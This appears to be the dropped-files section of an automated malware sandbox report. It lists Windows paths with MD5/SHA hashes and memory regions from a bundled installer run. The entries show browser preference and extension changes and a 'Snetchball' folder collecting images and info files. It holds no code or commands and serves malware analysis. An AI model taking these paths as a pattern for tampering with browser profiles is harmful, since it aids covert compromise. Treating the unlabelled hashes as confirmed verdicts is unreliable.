C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 33fa4ff360ec9a8654e59035f5bb6cae
SHA1 f1a362d8fde1d624ed76c015952650ee7114b551
SHA256 548d5279aba67f5159ab430fb7dc00ba5fe63d5da4100c1bbf163d2486cf51f5
SHA512 b4f8b4be0c8581d5d7b3381d63fe0ba0066d6d656aecea173816643e9d7a6a5a6fb315652f48c90a34f314f442fc1d26a097b3bb355d7e11aaddfdf862330a0f

C:\Users\Admin\AppData\Local\Temp\is-U8H3P.tmp\lu3msc4.tmp

MD5 da3e3293eadae0b9e8e0bb85b53bf263
SHA1 6fd7ba9a4f76f8500f7ec3d820f70ca0c869173f
SHA256 ecf5f7145a55f9014f86014fd3d9a6048b8f29e653409604e4d12cb1bda2302d
SHA512 c1b4a03f7f657f1db5bbf21f68ebce7373b90135698eb5fe4c432630e7066f0c89eeddd0f6cbb0af631ad62026992503df42e31e6999b166a541044c688a0fb8

C:\Users\Admin\AppData\Local\Temp\is-A3HEP.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 4280e36a29fa31c01e4d8b2ba726a0d8
SHA1 c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256 e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512 494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

memory/6100-420-0x0000000006730000-0x000000000677C000-memory.dmp

C:\Users\Admin\AppData\Local\Linux MultiMedia Studio\linuxmultiMediastudio32.exe

MD5 59f1e3638a87fd86859783f6a3606cfc
SHA1 7b59ef15e86b6f0717e9c424c3c0e5f6039feb07
SHA256 ff8d9dffd4774c92136d629ba23d2ca2d721f40f6aed77ebe80591634eafeb41
SHA512 eec3dceaab04e22ce7ccd47c203067676a36bd624c176ea74cf4515c188d6e6dad5e320508d048d2d59e44bf2dbebe3b0eaeeae3d7de6165fe26ff096794fa9b

memory/3416-460-0x0000000000400000-0x00000000006DC000-memory.dmp

memory/3416-463-0x0000000000400000-0x00000000006DC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\HLEFA8bv\axN9H2G7ob3elJr.exe

MD5 40d3cafa0a661638b6bcdb60fdffae67
SHA1 c8d0e0b5a914cf3b35c98fe118de2ac5a6b3ddf7
SHA256 57f1b563de0a40d250497e5705f19adbc3bef2d55803e951d68c0acd050cbdec
SHA512 892af18ac11cf21cb4bd07104089686cfbc2402819c285522a93230bb349788a31d3e1533e4690cf4387cb249fedb78b9f8a1e4e7beaccf5d69d168a31e95c43

memory/3592-468-0x0000000000400000-0x00000000006DC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nsfAAE3.tmp\blowfish.dll

MD5 5afd4a9b7e69e7c6e312b2ce4040394a
SHA1 fbd07adb3f02f866dc3a327a86b0f319d4a94502
SHA256 053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae
SHA512 f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511

C:\Users\Admin\AppData\Local\Temp\nsfAAE3.tmp\INetC.dll

MD5 92ec4dd8c0ddd8c4305ae1684ab65fb0
SHA1 d850013d582a62e502942f0dd282cc0c29c4310e
SHA256 5520208a33e6409c129b4ea1270771f741d95afe5b048c2a1e6a2cc2ad829934
SHA512 581351aef694f2489e1a0977ebca55c4d7268ca167127cefb217ed0d2098136c7eb433058469449f75be82b8e5d484c9e7b6cf0b32535063709272d7810ec651

C:\Users\Admin\AppData\Local\Temp\nsfAAE3.tmp\nsProcess.dll

MD5 faa7f034b38e729a983965c04cc70fc1
SHA1 df8bda55b498976ea47d25d8a77539b049dab55e
SHA256 579a034ff5ab9b732a318b1636c2902840f604e8e664f5b93c07a99253b3c9cf
SHA512 7868f9b437fcf829ad993ff57995f58836ad578458994361c72ae1bf1dfb74022f9f9e948b48afd3361ed3426c4f85b4bb0d595e38ee278fee5c4425c4491dbf

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ad003568e8f17b73e4c70e63189487fe
SHA1 5dbf4e47437a7343efafb821206fc5705f00efa1
SHA256 1493213ece84f7f3ef30608e12c168eff748a37c21bccb2ed6ffd06f8dc341a2
SHA512 fd986d8b767953e0720c5f0e0cb976c1bdad5c88d0cb1a144e6ffa028a3affb6a992334f1adbd8bc73087f12a0f1af5db4ad44574ef6e4f420027de083b7efe5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 e8d3beb4c99c2b284646854358aa7696
SHA1 8b8633c11bda41807969c655eb5e50f10d58088e
SHA256 e2014de688082e00f0afd0873eb5facbd85806a4526b8e51ea6293f70571dc6a
SHA512 66ec43a267504a208bd32754fd9512f8538dbf6bcf5036bb064827257195b8db1e7210040b10c50b6febcd0fe27168205e1ebe67246e5b6c2eb0a7b9ebc79c67

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 40bd0e5dd21e245892873dd1193d34be
SHA1 84e435188196c9ceac71bd85b1f0d7313d6e32a5
SHA256 7255911a45fbc26b0e81706345022f1139b0701ab900abbaa077057e8d6a4989
SHA512 66d59a33fba7621e0dfd5e425c929ba8ad6f2cd00aa47aba57fbd45c535547570a0b4a628840d4ecf89e0ccd37aa1597c6ca5716d7c0e8ee79063323d8192fe7

C:\Users\Admin\AppData\Local\Temp\nTDijDlZ\dWa7mnZkjotmkVs.exe

MD5 52d971e98bcd9c7eb753f70281cf7ba2
SHA1 877929f35d84b4730ee04a4f65f2aa29fc4b89c2
SHA256 73020c45e2dff60cc0cc4b525d4f7109699db21235c6da2c959155049bdf06a0
SHA512 16cb56cbdb1cd3f9fa82723bec5211ebfc2a6469be4fcaa5ce8b8db22af7f07f2b49d5d06a466b70e4c6dbb6bf4e259efa9c15e891c6f1be19fc88e953d82477

C:\Users\Admin\AppData\Local\Temp\7zS400DD298\setup.exe

MD5 b0850e9c32b789196a6c8682e3410122
SHA1 a420cf36e183fd3dd9960acc5805b5e6f2b3b732
SHA256 a78f5891edeb5de4ed9a7f3221518a216938ea5eaaef8a50a258a65fb5aecd2f
SHA512 636f4cf68c7ff2ba773b61cf17b58d028621c982f6634ad16534e8b3f6c80dd91c93a9579405798111710e1d3fb46a584ae41ac193d592365b20a57ecc35992f

C:\Users\Admin\AppData\Local\Temp\Opera_installer_2406102309462853612.dll

MD5 2ada940614c61329829fb101f3dd100b
SHA1 4441a58c0726a26ba05dad9541413219d6ef6d84
SHA256 ad63ddb2395cc0661fdf61aee5d968c00c833fe9a0ea533a570c2f8b5dddae10
SHA512 d1987ec85374013afb76179cb222c6ffcf2888c8c201e79b3e353c17ac140a6f5200bdfdf2955fbed1f877f871dd08794dce69087cf965e8851ccd619dfbc05a

memory/220-581-0x00000000055A0000-0x00000000058F4000-memory.dmp

memory/220-587-0x0000000006290000-0x00000000062DC000-memory.dmp

memory/2388-595-0x0000000000400000-0x0000000000C0F000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 ef1f24f8c743ec916d02204a69cce18a
SHA1 01167c53bc6f75f657c0bfd2caed216df973a02b
SHA256 3dfc3340710a9065f3d2821fb7a0071378fb038dbbd4db04c1a27dd24d513e38
SHA512 77dd9303083805e90ee28ccc657327c14affc567597184990e7b885be7385041420d77735d73c3d6bcb3af31aec676b283bdc9c44c56ad207a88d398449aa3b7

memory/732-622-0x0000000005B20000-0x0000000005E74000-memory.dmp

memory/732-629-0x0000000006620000-0x000000000666C000-memory.dmp

memory/732-635-0x00000000066D0000-0x00000000066F2000-memory.dmp

memory/732-634-0x0000000007170000-0x0000000007206000-memory.dmp

memory/732-636-0x0000000007B00000-0x00000000080A4000-memory.dmp

memory/5312-654-0x0000000010000000-0x0000000011E6A000-memory.dmp

memory/2388-658-0x0000000000400000-0x0000000000C0F000-memory.dmp

memory/3592-661-0x0000000000400000-0x00000000006DC000-memory.dmp

memory/3420-660-0x0000000000400000-0x00000000004BA000-memory.dmp

memory/2900-659-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202406102309471\assistant\Assistant_110.0.5130.23_Setup.exe_sfx.exe

MD5 028fb19ee2cea3e611b4a85ac48fafbc
SHA1 d1a802b5df649282e896289b4ec5df8d512b53dd
SHA256 e8fa79e22926ae07a998b5d2bb1be9309d0a15772ac72b88f4eed66052f33117
SHA512 99959d7765c1e6636dee1841f214cb2d0c7684d7128381b0387fa9c7ef4a92ef62bb094087bdcb343e44196b5a333df3a2104ced9f49671197a06fafa27aff51

memory/5436-686-0x0000000005AC0000-0x0000000005E14000-memory.dmp

memory/5436-699-0x0000000006190000-0x00000000061DC000-memory.dmp

memory/3592-704-0x0000000000400000-0x00000000006DC000-memory.dmp

memory/5056-718-0x0000000004910000-0x0000000004C64000-memory.dmp

memory/2388-723-0x0000000000400000-0x0000000000C0F000-memory.dmp

memory/2928-729-0x0000000010000000-0x0000000011E6A000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 e0645b81f8f750a075a46c8d9ef91c19
SHA1 5dd0a86aff0d4dd237f74fb6ccac578a5dd2a293
SHA256 6e27f313aeb8765a218303b7e3c0e1084e77e062b17db9c8d6386e4d910dafb3
SHA512 836847e05d705e0c2801a0790ab9494b732d297a9673e6ae40f26df0120ae1b07afdc8d3822920beba0ad9b5f119daa400253a026b4efc4e6bcf5bbcbcc4f266

memory/3592-912-0x0000000000400000-0x00000000006DC000-memory.dmp

memory/6380-943-0x000001DE9C600000-0x000001DE9C622000-memory.dmp

memory/2388-951-0x0000000000400000-0x0000000000C0F000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 4da98f4465cff0163cd6bb676527cbf1
SHA1 dcdee735cfdc2d59afdc9600b64fb45e4442e769
SHA256 c0733ca1897b3881863e7ffbbb7666b78047d8d4a459df89a9aa51611e70b279
SHA512 e4857232f996e03283460aeacf38afbec8435a9ce22028ed68a33c90404a077b9966dcc09bc68f20b17a46237bd6bae50d2c78b9155570c53d1bcbc406ce64b4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe593eb5.TMP

MD5 fa96c78f40ece5a92b6a3f1b6c0eed88
SHA1 171ab4a2ba012f921120a488ea0435e8b9b305b1
SHA256 abc74a4b73f51fc7df819418893c22d9ec9871b773368578147db366925e529d
SHA512 c0f99fa5716d507591cbfbfed5dc96cf7df077176d1723e17c78d0eca1e3565896e6a5f45e262c60ba2e54685f53e15b9bc66677e9e836917955ce0836a3d3df

C:\Users\Admin\AppData\Local\Temp\nsm4704.tmp\liteFirewall.dll

MD5 165e1ef5c79475e8c33d19a870e672d4
SHA1 965f02bfd103f094ac6b3eef3abe7fdcb8d9e2a5
SHA256 9db9c58e44dff2d985dc078fdbb7498dcc66c4cc4eb12f68de6a98a5d665abbd
SHA512 cd10eaf0928e5df048bf0488d9dbfe9442e2e106396a0967462bef440bf0b528cdf3ab06024fb6fdaf9f247e2b7f3ca0cea78afc0ce6943650ef9d6c91fee52a

memory/3420-1051-0x0000000000400000-0x00000000004BA000-memory.dmp

memory/3592-1060-0x0000000000400000-0x00000000006DC000-memory.dmp

memory/3592-1052-0x0000000000400000-0x00000000006DC000-memory.dmp

memory/6252-1061-0x0000000000D00000-0x0000000000D52000-memory.dmp

memory/6252-1062-0x00000000055C0000-0x0000000005652000-memory.dmp

memory/6252-1063-0x0000000005660000-0x00000000056AA000-memory.dmp

memory/6252-1064-0x0000000005B10000-0x0000000005BEC000-memory.dmp

memory/6252-1078-0x0000000006440000-0x00000000064DC000-memory.dmp

memory/6252-1079-0x0000000006870000-0x0000000006900000-memory.dmp

memory/6252-1080-0x0000000006A00000-0x0000000006D54000-memory.dmp

memory/3616-1095-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/2388-1096-0x0000000000400000-0x0000000000C0F000-memory.dmp

memory/3592-1114-0x0000000000400000-0x00000000006DC000-memory.dmp

memory/2252-1124-0x00000000055B0000-0x00000000055FC000-memory.dmp

memory/3616-1129-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/2388-1130-0x0000000000400000-0x0000000000C0F000-memory.dmp

memory/7124-1132-0x0000000010000000-0x0000000011E6A000-memory.dmp

memory/7116-1143-0x0000000005000000-0x000000000504C000-memory.dmp

memory/7124-1152-0x0000000002810000-0x0000000002895000-memory.dmp

C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi

MD5 058add38d8d56fefb0398037369088b8
SHA1 1dd4cf454c5114aed1b98a1a4b1da49a95a0aa87
SHA256 01dbf399db22910d5f930a3ec4a09be59b68d206288ff1688628511205a16d8f
SHA512 c2f4bb37147092a67c36f527879b0f81bf7589c57c2f6749ace2b6dad3f8d37324dcf63f0d8b767ed85246735c847b7a85fb0116127930de1f5ba6854c777af9

memory/7124-1192-0x0000000002F20000-0x0000000002F82000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\en\messages.json

MD5 33292c7c04ba45e9630bb3d6c5cabf74
SHA1 3482eb8038f429ad76340d3b0d6eea6db74e31bd
SHA256 9bb88ea0dcd22868737f42a3adbda7bf773b1ea07ee9f4c33d7a32ee1d902249
SHA512 2439a27828d05bddec6d9c1ec0e23fc9ebb3df75669b90dbe0f46ca05d996f857e6fbc7c895401fecfae32af59a7d4680f83edca26f8f51ca6c00ef76e591754

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\pt_BR\messages.json

MD5 5c5a1426ff0c1128c1c6b8bc20ca29ac
SHA1 0e3540b647b488225c9967ff97afc66319102ccd
SHA256 5e206dd2dad597ac1d7fe5a94ff8a1a75f189d1fe41c8144df44e3093a46b839
SHA512 1f61809a42b7f34a3c7d40b28aa4b4979ae94b52211b8f08362c54bbb64752fa1b9cc0c6d69e7dab7e5c49200fb253f0cff59a64d98b23c0b24d7e024cee43c4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\bnaebcjlolajbgllgjlmlfobobdemmki\3.8.26_0\_locales\es\messages.json

MD5 a14d4b287e82b0c724252d7060b6d9e9
SHA1 da9d3da2df385d48f607445803f5817f635cc52d
SHA256 1e16982fac30651f8214b23b6d81d451cc7dbb322eb1242ae40b0b9558345152
SHA512 1c4d1d3d658d9619a52b75bad062a07f625078d9075af706aa0051c5f164540c0aa4dacfb1345112ac7fc6e4d560cc1ea2023735bcf68b81bf674bc2fb8123fb

memory/3592-1512-0x0000000000930000-0x00000000009D2000-memory.dmp

memory/3420-1517-0x0000000000400000-0x00000000004BA000-memory.dmp

memory/3592-1518-0x0000000000400000-0x00000000006DC000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 813a8918ddb568eafeb954f91697b5f0
SHA1 fe7451adb62d806df7f42a33069026d3438311f4
SHA256 850a9e0a93531f8ec7d342b33f6897fabaa68ef9825ab87d8383fd1a7c976778
SHA512 776f50a2bfdd6876c800769ec79b5c5d250a615a39bde5af618ef4623beb0a7f985471b833a5fdf04df9bfbc23d36fb1c987e9427ca84d239cf55ab6e85dbfb4

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qzr7kws6.default-release\prefs.js

MD5 2b9b4dce1e600d2d6f8afcfb826401a2
SHA1 835cb5e8d32f1948ed362c551ecd4b21a5eb09fd
SHA256 7e8c6c170f7cea04489587307e3836ffced249bed1c790105f3e2ddd743edfc0
SHA512 f57ed61c2feda037b1787d8e70495a49badcf5c88a4914bc1a2cdae4960bf3f1801d9effb09b08d2c37bfd7f59a670290c1aa34a6173743536afb3e806edb423

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 2674ee63a0334b9a1f0b65f056691aa2
SHA1 713966381fc19322ee23208e5943270c56db31c9
SHA256 581359afa0dd27f2997daf08931ef0d99f4d8d203ee403e4caea0a9b5a887455
SHA512 09e8e2b803b26d191af761b90a19e552dd0e2f6b6f93af85923e8dbf0c407689698c00e0e05d281b822f234c8cab8b11c90d72e690cd68fb46417123ee867fc4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

MD5 90b8e3c077c7289cf4b7078243e26f76
SHA1 c8e3387c59c20fcff770b846e972a52f7f93591c
SHA256 001c51870a28710313d50d9037f261881517a384d3e502d9112b04ea2e8538a1
SHA512 4461003ce00d03608509d7ab645b933ec95c398623a1d8c6440c8a5b069d32e73aff391a1d3954511dfca7da698c0820970017b66629e3647800e5cc3920f1cf

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\77431409-2c92-4239-921a-d843290a8378.tmp

MD5 5058f1af8388633f609cadb75a75dc9d
SHA1 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 6feeb0fef26e15da1445dcac241876ef
SHA1 d21e32d3296cc693692f51b64bf686dee358a403
SHA256 5b82617932e4629bb3391b1516328fe5d052b8d6de9ee8aef934939754a7c3c5
SHA512 e04c85acff76b8d9f10128e97787ed95917ab0c829ecc68071ef0c77db11827073b9073e4398ba0fe9f5c3f3d69a3d533cd19009014727ac816f4a6ca315fd89

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 1119747c353a8756854ee93ac43061da
SHA1 41d0b808eedb39c4aa65d8cbefa6d2be35bac28e
SHA256 18b0be4f1c08e9a5ce73d42111648de9fc566e8a29815fbb3553380af0f1b030
SHA512 67d0b77c6e50c936eb4090d71f199e32c253e4f1277c71f6e044ac549625b549f6bc5a664fbf424dbc27e3e817f945870bc7dab77d73da201316772d43f7c410

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 45becad4b69a13a1a1625c608c3db02d
SHA1 2c0b69f532423e398943ee6a458b51778ff5ece2
SHA256 0bbf92a25b3647c8f424a6d9b26e05fc8d48c1d9855f23159d6098e72409aa33
SHA512 fc65a06ae790b2c24ee22eb4b82b86651f3bf3537f0857bef15b7d3c0893773d0005790253415cfffd9d2e65353f93aa65bcfbe8c9ac54bd4d8d4b384ebba78e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 aefd77f47fb84fae5ea194496b44c67a
SHA1 dcfbb6a5b8d05662c4858664f81693bb7f803b82
SHA256 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611
SHA512 b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 4869a1ac033361ddebec94c14cc72527
SHA1 9167798ca80aa10799617839eac7671d7a80ee50
SHA256 74905ae1d2e38473f8a09cbbc736ebb6d12c18c47f420a2a5fc8d7d907d6d2aa
SHA512 1fe0f0cd7188027f8dd8c82fe9cfe758d0b93f81a5e60818bac7417a5db4cfb30bb373164ab2173567cd76e6674fa588e5f6aaa2e21fc4af34b8d09ba7c09314

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 52b286ef2ef4aff41d54397b3d47a348
SHA1 11f78664850c5310e9d8c79f8ea1ee60ca0fcfe7
SHA256 e94d4776e667b025cd6ce3a9cb7b3b05d196b989bbabc46fb6a122ca1afa8752
SHA512 923a1642626d9a83c07900d94c01c21add1e7b26a06afce7275abe20ad164b6c9758b3c7e7f9f8b0abc0787671883d636979413530b1b8e64d9c5a6537b88e7e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 56b509e7087dcbbf500a750f0fe02b57
SHA1 c00fca769303e2b241a42e0651431a54ca9634f2
SHA256 630ec67fbba43e87ecb04520756ee6610d4aa51a6e920b853f3360b926fca1e9
SHA512 673e579d29b28cf434d56da31e8b42512d61d431dd76a48dfca14b9aa40e2447351b1cc45ba82a3f829a0bd0a64372ce2ae8192c8688d0088e17ea9f574bfb72

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\4e5ad7fc-5858-424b-86e2-20eceac2331b.tmp

MD5 a34359d4f20d2b2bd34dd9871ea649ea
SHA1 99bc8b2109c6743c5fe42cdc56f4ce93c8086823
SHA256 0e60810dcee95f89bdef9372df9b0db2b7a6e5014a84c5fe671d00ada3352c67
SHA512 e4d7a14104c28085bc066b339c0441caf14f9a58fdc9b33cc136eb69f5f6a5604d4e8f83095dcdc77cf7e2468d7dcc21e5181f182e2dc065c9b7e002fd2238b6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 ab00991f1d3e502bb481718aa917597e
SHA1 e919fe245b2e646a844ea2b56689be222440fb03
SHA256 1ad7787e889c4a459e0e6135600b9d2e67b258ba3d97c078fcd43df3dbdbe62f
SHA512 8d5e369da36c3f98a42172bcd504d06eaabf4322809612c6d06c4779ab3dd82cbea147f78fb3fbde6c19212a6708c0d7a8aaa5a1a8b51ec1452cadaeadd2fa01

C:\Users\Admin\AppData\Roaming\Snetchball\images\0.jpg

MD5 81cb6465f791be20ab699f63ff212518
SHA1 c3aaf7c0031fb3d208494ad5cd54c72430a44534
SHA256 065295e10b7b1e5ed605ce5cf6b108c62dc1b8278914ccd40425e756693637e7
SHA512 305c36a11c3fcb6b864eb822fe5118494086a8a8b7a9296b3121fab794b2294995e9fbfe2da7a2be8912b77c72cd687458251061b18113b04f85c7d53a2a7bd4

C:\Users\Admin\AppData\Roaming\Snetchball\images\3.jpg

MD5 302bbda00dab1d0b6190cd57df10f212
SHA1 275d439d526303f98afc82cc2180d37a05ec206b
SHA256 2c6465595a1e2db398f88e60305ee29b122e3abfab639cb4151c7e0a6ade9eb0
SHA512 a4976e71ef6606187c7b21c0c3950e3bbac6e1e7778024efb9bcb5ba42bba8cedd8a316df67a1cd85db85b4dd80675d1d04a1c003e2dc96818b4e42fdc58c0a5

C:\Users\Admin\AppData\Roaming\Snetchball\images\4.jpg

MD5 4c46007ccdebf76df44df26f52d15288
SHA1 7adccf75d8e85b7ecd77d79bb6a6604acf9d7683
SHA256 9c5db65872f3694cba46a23c92a1dfa725c8de7ac01a4370248d7a4833d61eff
SHA512 1b48efe49f660acc8f181942d09ff1f1218a962c843cfbf7687c92d889567730d29e88ab644458d836269eefae94f05f4b3cf08e820dc1a42dfe759a12c6aaf8

C:\Users\Admin\AppData\Roaming\Snetchball\images\2.jpg

MD5 d1c40ef3dc48934cf2245d31d9f32552
SHA1 f6ba50aca34c6c077e2c5a2feabe07c7a07525b2
SHA256 dfd59dd38c33229566d3971e72f8e46a3f90157d295e1e0af8a583a1168ebd58
SHA512 04175f3989d1ed92a615ff410d8ed92ddce7e63132313e7e3519eec61d614d090884b47e06e53a50234b486131da77890765c4a9ed00052b463da21af153801a

C:\Users\Admin\AppData\Roaming\Snetchball\images\1.jpg

MD5 1589ad0a375378f5c0817c6594246568
SHA1 4d09fc9e2213798f17d7095963d12838111d8659
SHA256 d90da60c4e43678306610d356d36097502be87d949229eb65e270c6f9a0d9750
SHA512 bc808eb23187d036a268a17e9fd6fc549f44e8ea4b447953e7924c0d40cb47284e48c2fb1da20c9638e96806eb40d1e54cb200d082607896f4d320b074c63c65

memory/6396-1789-0x0000000008BF0000-0x0000000008C68000-memory.dmp

memory/6396-1790-0x00000000091A0000-0x00000000096CC000-memory.dmp

C:\Users\Admin\AppData\Roaming\Snetchball\results\1_info_0.txt

MD5 c9a715b558c4abdc09d1011774247791
SHA1 d4f3fd0b34db43a52c6440aef4fcf23d660bfbe3
SHA256 e80d3e9567cb42fc58bf5a49629e3e6b665c63aac1c618def520e7ee3ddd7afb
SHA512 a398f8afa2f28bfb861d7914a7a7ee2ca25b16c97201fa7938d323de932a5ddbb0f3415e88dd8db2209339e08ee415185b5a575851b9162e4bc23d94877a0c49

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

MD5 0c20f4dee910b07457317f672f36da00
SHA1 31d21f0f80db60187adc016e994b97cadb563e2b
SHA256 9c734db3f1fc7c7cba0c550683160d2a372447e550fbc1881c5ff46761c826c5
SHA512 7309a5b35f670b1bbebf39d7bcd1ed7582165ab3a9ff51b4c6f3d2418f586226804dd271209375a1435c072572589441907fccc86bebe9522cabbf977b2bafb3

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 30a6b3bdd82ec5c73f455264b8f338d7
SHA1 0983f8c372b2c5edaf8c892b728f8dc91ea861e5
SHA256 5ebad85744d65ff774bda86b97700c1835fafd785129a6307438514afeb7c175
SHA512 a5b714eb5b774d4bf6c55137f268e4e123497cdd838a62ab0320f19db3428d62359583a7a09e94102fd564f2675e647cac44fa50e391e35c4b04213f83e8242f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 97fcf6d18c445ed28a19e9b17ec73a3b
SHA1 83d4f9590398872a36b9632ba2349a98e11015d1
SHA256 7a74852d6ef6038ac1b3bcdae1a3196b230c9534f0268439533579f2c4ab3c89
SHA512 86a0ae5992d5f8b6976abad451ce10715678b2b11beba1c318c6001453bc7af46e360abac37b9ceaf58bff9cb7ef5bf4e938cff51da8132d463222bd747e9c84

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 12e14924845d5c9651c7692d3fcc2fc3
SHA1 83b22d9459a5f4d15d02ae2d6b18e207a387b15a
SHA256 74a35b394b000bcac079e7c191a89cddb65d9570120d06e8c39090b246eb6a20
SHA512 5824b8159d4ab4d888231965cb31bf9c5b954169809affc9bf5489e61c66d5c9ac4f0336a6d9f64074a390cfe8bd6443b282a3836c18b57186c4985c14ed9b88

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 3544b6a0cc52b84669e8a1fb952ba341
SHA1 54d943058230cb7adacf623f474e966477d08ea5
SHA256 93ed61270ae46885da9a42dbcaafd4e658c8d23ac57d489c3a804b78d267f7e6
SHA512 cca7bbdda82ebd28d188ea18a54bc5b1a660ca9da84dcc1da2dbb8b0e49bc411630fb101f490db282889a1b0f67b99e728f4d5a68b7dc5de535a4b51dcc6739d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 d76bd3dde91920e33230e3f4cde79c0b
SHA1 1c40ec36de51a07189d58dfb23b5a589a05e2391
SHA256 19daa3484b3e1e25a677d9c2f02b9b102e7a0932f9b16972531355a2bc31b5bf
SHA512 8562b1b4984244130f5b98550ff3935ebd9b51e357a99aed7c2fc9e2a12b179dece7bdaa6e56f8e71c23c6168f33c9f925e0ca07f2e6d7670ffa1f2a865ec72f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 b072b5f03fb55c3f929e909ebbcf4a38
SHA1 cc0439c4905bf6e1edc313d952b07df8d0534a9b
SHA256 25c9b4a8cd53847ce3f7c4cf2627edb284ec571f944cd5472c1950215bb3797d
SHA512 1a399916ef8604194bbe84e041ad85338cc125bec91452bf3abb4f037e022232af6332ef185dcbd6318358d5cdb18d4e324edd57b2bdcc71958a9cb2587ef744

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 5cfb3acbdc7172670af56344a53d4d02
SHA1 e900a9dd5b57c058dcec8efd4667b797c6dc16cb
SHA256 5530b77e8d30803ea38cefff057fdc1e93f1ff4643ae1084a2d392a93ad8c1df
SHA512 dfe92a2bb404891204fd29ca97a43bda1675d66d117088e3e59d01560af69816761b87fde926be65a6eed2ca85bd69c9c98d606bd6eacc007df3dec041070526

C:\Users\Admin\AppData\Roaming\Snetchball\info_0.txt

MD5 f99dbdef252d50670760643c21d3ccb4
SHA1 4a48614ca4cc207f5d82ae7efc4c49d8e9a5578d
SHA256 26aa91145d7e91272f10c8883d8116b2b84821e1ba199421a879418a8f53dab8
